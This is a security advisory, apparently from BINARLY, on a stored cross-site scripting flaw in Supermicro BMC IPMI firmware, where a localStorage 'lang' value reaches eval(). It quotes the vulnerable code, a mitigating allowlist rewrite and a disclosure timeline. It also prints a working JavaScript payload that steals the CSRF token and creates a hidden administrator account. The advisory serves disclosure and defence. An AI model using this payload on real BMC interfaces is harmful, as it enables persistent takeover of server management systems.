Stored cross-site scripting vulnerability in Supermicro BMC IPMI firmware in the `man_ikvm_html5_bootstrap` and `man_ikvm_html5_bootstrap_vm` webpages using `lang` local storage item
The BINARLY team has discovered a stored DOM-based cross-site scripting (XSS) vulnerability in the `man_ikvm_html5_bootstrap` and `man_ikvm_html5_bootstrap_vm` webpages, which read the `lang` local storage item, included in the web server component of Supermicro BMC IPMI firmware, allowing a possible attacker to gain access to an account with administrator privileges.
Potential Impact
An attacker could exploit this vulnerability to create an account with administrative privileges on the web server component of the BMC IPMI software. Such an account provides full access to these settings: System Information, Chassis Locator Control, FRU Reading, Sensor Readings, Event Log, Alert, LDAP, Mouse Mode, Network, SMTP, SSL, Users, Event Action, Power Control, KVM, F/W Update, Logout. It also allows exploitation of vulnerabilities that require authentication. Successful exploitation of this vulnerability provides an attacker with persistence, allowing malicious code to be executed until the victim takes remedial actions.
Vulnerability Information
- BINARLY internal vulnerability identifier: BRLY-2023-012
- Supermicro PSIRT assigned CVE identifier: CVE-2023-40286
- BINARLY calculated CVSS v3.1: 8.6 High AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
- Supermicro PSIRT calculated CVSS v3.1: 8.3 High AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Supermicro firmware
| Device | Version | SHA256 |
|---|---|---|
| X11SSM-F/X11SAE-F/X11SSE-F | 1.66 | dbc3842a5e3918463690fa165b2b0955989c00702bc7284af5875ef08e7606b1 |
Vulnerability description
The `man_ikvm_html5_bootstrap` and `man_ikvm_html5_bootstrap_vm` webserver HTML pages load the `nav_ui.js` script, which passes the value of the `lang` local storage item to the `eval()` JavaScript function without any sanitization:

```javascript
// nav_ui.js (excerpt): the "lang" setting is read back from storage and handed to change_ui_lang()
...
var sel = WebUtil.readSetting("lang", "en");
...
change_ui_lang(sel);
...
WebUtil.readSetting = function (name, defaultValue) {
    "use strict";
    var value;
    if (window.chrome && window.chrome.storage) {
        value = WebUtil.settings[name];
    } else {
        // Source: the value comes straight from localStorage, which any script
        // running on this origin (or any process able to write the browser profile) can set.
        value = localStorage.getItem(name);
    }
    if (typeof value === "undefined") {
        value = null;
    }
    // Note: `typeof defaultValue !== undefined` compares a string with undefined and is
    // therefore always true; a stored value is returned whenever one exists.
    if (value === null && typeof defaultValue !== undefined) {
        return defaultValue;
    } else {
        return value;
    }
};
function change_ui_lang(v) {
    ...
    // Sink: the stored string is concatenated into source text and evaluated.
    var lang = eval(v + "_lang");
    ...
```
As a result, arbitrary JavaScript code can be injected into webpages, which will be executed on behalf of the authenticated user.
Steps for exploitation
The first step to exploit this vulnerability is to poison the `lang` local storage item. This can be achieved using another vulnerability in the web server (e.g. with XSS), as well as through exploitation of other system components, for example with malware.
To create an administrator account with username `BRLY` and password `BRLYBRLY`, an attacker can poison the `lang` local storage item of an authenticated user session with administrative privileges with the following payload:

```javascript
var csrfRegex=/CSRF_TOKEN", "([^"]*?)"/g;var csrfMatch=csrfRegex.exec(document.body.innerHTML);var csrf=csrfMatch[1];fetch("/cgi/op.cgi",{method:"POST",headers:{"Csrf_token":csrf},body:"op=config_user&username=BRLY&original_username=2&password=BRLYBRLY&new_privilege=4&_="});
```

This payload first obtains the user's CSRF token and then uses it to make a POST request that creates a user with administrative privileges and credentials defined by the attacker.
NOTE: The payload is executed every time the victim visits the vulnerable pages while the `lang` local storage item value is poisoned, even after logging in again, making this attack persistent. To terminate the exploitation, additional steps are required to clear the poisoned local storage item.
How to fix it
Ideally, user-controlled inputs should not be passed to dangerous JavaScript functions such as `eval()`. Where that is not possible, the `lang` local storage item value must be checked against a whitelist of allowed values before use.
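A hardened replacement for the `eval()`-based lookup, added here as an example and not part of Supermicro's firmware: the language tables, the stand-in storage object and the `selectLang`/`changeUiLangSafe` names are all constructed for this example.

```javascript
// Hardened equivalent of the vulnerable readSetting("lang") -> eval(v + "_lang") flow.
// Language tables live in a fixed object and the stored value is allowlisted
// before it is used as a key, so a poisoned "lang" item can never reach eval().

// Constructed language tables (the firmware's real en_lang/cn_lang objects are assumed
// to be plain objects of UI strings).
const LANG_TABLES = {
  en: { login: "Login", logout: "Logout" },
  cn: { login: "\u767b\u5f55", logout: "\u9000\u51fa" },
};
const ALLOWED_LANGS = Object.keys(LANG_TABLES);
const DEFAULT_LANG = "en";

// Minimal in-memory stand-in for window.localStorage so the example runs outside
// a browser (constructed for this example).
function makeStorage(items) {
  return { getItem: (k) => (k in items ? String(items[k]) : null) };
}

// Returns a safe language code: only allowlisted values survive; anything else,
// including an injected payload string, falls back to the default.
function selectLang(storage, fallback = DEFAULT_LANG) {
  const raw = storage.getItem("lang");
  return ALLOWED_LANGS.includes(raw) ? raw : fallback;
}

// Replacement for change_ui_lang(): a property lookup on a fixed table, never eval().
// The own-property check also rejects inherited keys such as "constructor".
function changeUiLangSafe(v) {
  if (!Object.prototype.hasOwnProperty.call(LANG_TABLES, v)) {
    throw new Error("unsupported language: " + v);
  }
  return LANG_TABLES[v];
}

// Self-check with a poisoned and a clean storage value (both constructed).
const poisoned = makeStorage({ lang: "alert(1);//" });
const clean = makeStorage({ lang: "cn" });
console.log(changeUiLangSafe(selectLang(poisoned)).login); // "Login" (fell back to "en")
console.log(changeUiLangSafe(selectLang(clean)).login);    // Chinese "login" string
```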
Disclosure timeline
This bug is subject to a 90-day disclosure deadline. After 90 days have elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.
| Disclosure Activity | Date (YYYY-mm-dd) |
|---|---|
| Supermicro PSIRT is notified | 2023-06-28 |
| Supermicro PSIRT confirmed reported issue | 2023-06-29 |
| Supermicro PSIRT assigned CVE number | 2023-08-17 |
| Supermicro PSIRT provided patch release | 2023-10-03 |
| BINARLY public disclosure date | 2023-10-03 |
Acknowledgements